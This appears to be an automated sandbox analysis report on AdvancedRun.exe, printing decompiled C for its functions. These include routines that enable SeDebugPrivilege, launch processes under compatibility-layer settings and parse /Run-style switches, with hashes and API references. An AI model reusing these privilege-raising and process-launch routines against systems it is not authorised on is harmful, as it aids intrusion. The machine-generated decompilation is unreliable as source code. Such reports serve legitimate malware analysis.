API ID: ??2@$memset
String ID:
API String ID: 1860491036-0
Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18

Uniqueness

Uniqueness Score: -1.00%

Function 004054DF, Relevance: 5.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E00404951(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}

0x004054ea
0x004054ec
0x004054f1
0x004054f4
0x004054f7
0x004054fa
0x004054fe
0x00405501
0x00405505
0x00405508
0x0040550b
0x0040551b
0x0040550d
0x0040550f
0x0040550f
0x00405521
0x00405527
0x0040552b
0x0040552e
0x0040553f
0x00405530
0x00405532
0x00405532
0x00405556
0x00405561
0x0040556e
0x00405571
0x00405578
0x0040557e

APIs

wcslen.MSVCRT ref: 004054EC
free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F

Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E

free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
memcpy.MSVCRT ref: 00405556

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: free$memcpy$mallocwcslen
String ID:
API String ID: 726966127-0
Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98

Uniqueness

Uniqueness Score: -1.00%

Function 00405ADF, Relevance: 5.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00405ADF() {
				void* _t25;
				signed int _t27;
				signed int _t29;
				signed int _t31;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x41c470;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x41c470 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41c474 = 0x100;
					 *0x41c478 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27);
					L0040B26C();
					 *0x41c458 = _t27;
					_t52 = 4;
					_t29 =  *0x41c474 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040B26C();
					 *0x41c460 = _t29;
					_t54 = 4;
					_t31 =  *0x41c474 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040B26C();
					 *0x41c464 = _t31;
					_t56 = 2;
					_t33 =  *0x41c478 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33);
					L0040B26C();
					 *0x41c45c = _t33;
					return _t33;
				}
				return _t25;
			}

0x00405adf
0x00405ae6
0x00405af5
0x00405af6
0x00405afb
0x00405b00
0x00405b0a
0x00405b18
0x00405b19
0x00405b1e
0x00405b2c
0x00405b2d
0x00405b36
0x00405b37
0x00405b3c
0x00405b4a
0x00405b4b
0x00405b54
0x00405b55
0x00405b5a
0x00405b68
0x00405b69
0x00405b72
0x00405b73
0x00405b7b
0x00000000
0x00405b7b
0x00405b80

APIs

??2@YAPAXI@Z.MSVCRT ref: 00405B19
??2@YAPAXI@Z.MSVCRT ref: 00405B37
??2@YAPAXI@Z.MSVCRT ref: 00405B55
??2@YAPAXI@Z.MSVCRT ref: 00405B73

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AdvancedRun.exe PID: 7092 Parent PID: 5956 AdvancedRun.exeCOMMON

Executed Functions

Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}

APIs

GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8

Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8

GetLastError.KERNEL32(00000000), ref: 00408FEA
GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E

Strings

AdjustTokenPrivileges, xrefs: 00409039
LookupPrivilegeValueW, xrefs: 00409005

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
API String ID: 616250965-1253513912
Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68

Uniqueness

Uniqueness Score: -1.00%

Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
					_v20 =  &_v1316;
					goto L11;
				}
			}

APIs

memset.MSVCRT ref: 00402300
memset.MSVCRT ref: 0040233E
memset.MSVCRT ref: 00402356

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

wcschr.MSVCRT ref: 00402387
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0

Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69

wcschr.MSVCRT ref: 004023B7
memset.MSVCRT ref: 004023D9
SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
wcschr.MSVCRT ref: 0040242B
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
memset.MSVCRT ref: 004024BE
memset.MSVCRT ref: 004024D1
_wtoi.MSVCRT ref: 00402519
_wtoi.MSVCRT ref: 0040252B
memset.MSVCRT ref: 00402561
memset.MSVCRT ref: 00402574
_wtoi.MSVCRT ref: 004025BC
_wtoi.MSVCRT ref: 004025CE
wcschr.MSVCRT ref: 004025F0
memset.MSVCRT ref: 0040260F
ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
_snwprintf.MSVCRT ref: 0040264C
SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888

Strings

640X480, xrefs: 004026CE
DISABLETHEMES, xrefs: 004026DD
16BITCOLOR, xrefs: 004026BA
256COLOR, xrefs: 004026AE
HIGHDPIAWARE, xrefs: 004026FB
RunAsInvoker, xrefs: 00402677
DISABLEDWM, xrefs: 004026EC
"%s" %s, xrefs: 0040263B
__COMPAT_LAYER, xrefs: 00402814
D, xrefs: 00402374

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
API String ID: 2452314994-435178042
Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t154;
				int _t156;
				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
					E004056B5(_t158, __eflags, _t82, _a12); // executed
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
									__imp__CoInitialize(_t156);
									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t154 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152); // executed
					_t156 = _t154;
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}

0x00408533
0x00408533
0x00408536
0x0040853e
0x00408546
0x0040854d
0x00408559
0x00408563
0x00408569
0x00408572
0x00408583
0x0040858d
0x00408595
0x0040859e
0x004085a2
0x004085a6
0x004085aa
0x004085ae
0x004085b8
0x004085c1
0x004085c8
0x004085cd
0x004085cf
0x0040867f
0x00408688
0x0040868d
0x0040868f
0x00408730
0x00408735
0x00408737
0x0040873d
0x00408750
0x0040875d
0x00408763
0x00408770
0x00408775
0x00408779
0x0040878b
0x00408790
0x004087a2
0x004087aa
0x004087b8
0x004087be
0x004087c3
0x004087c9
0x004087d2
0x004087df
0x004087e3
0x004087e6
0x00408801
0x004087e8
0x004087f8
0x004087fe
0x00408811
0x00408816
0x00408816
0x0040881c
0x00408822
0x00408779
0x00408824
0x00408829
0x00408833
0x00408834
0x00408840
0x00408848
0x0040884c
0x00408850
0x00408855
0x0040885a
0x00408860
0x004088ac
0x004088b1
0x004088b3
0x004088bf
0x004088c5
0x004088cb
0x004088da
0x004088ea
0x004088ed
0x004088f8
0x004088ff
0x00408905
0x004088b5
0x004088b5
0x004088b5
0x00000000
0x00408862
0x00408862
0x0040886d
0x00408874
0x0040887b
0x00408882
0x00408889
0x00408895
0x00408897
0x00408658
0x00408658
0x0040865d
0x00408661
0x0040866a
0x00408673
0x00408678
0x00000000
0x00408678
0x00408860
0x00408695
0x00408695
0x0040869f
0x004086a2
0x004086af
0x004086a4
0x004086a7
0x004086a7
0x004086b4
0x004086bf
0x004086cb
0x004086d3
0x004086d7
0x004086db
0x004086e0
0x004086f1
0x004086f8
0x004086ff
0x00408706
0x0040870d
0x00408719
0x0040871b
0x00000000
0x0040871b
0x004085d5
0x004085da
0x00000000
0x00000000
0x004085ec
0x004085ef
0x004085f6
0x004085fd
0x00408604
0x0040860b
0x00408612
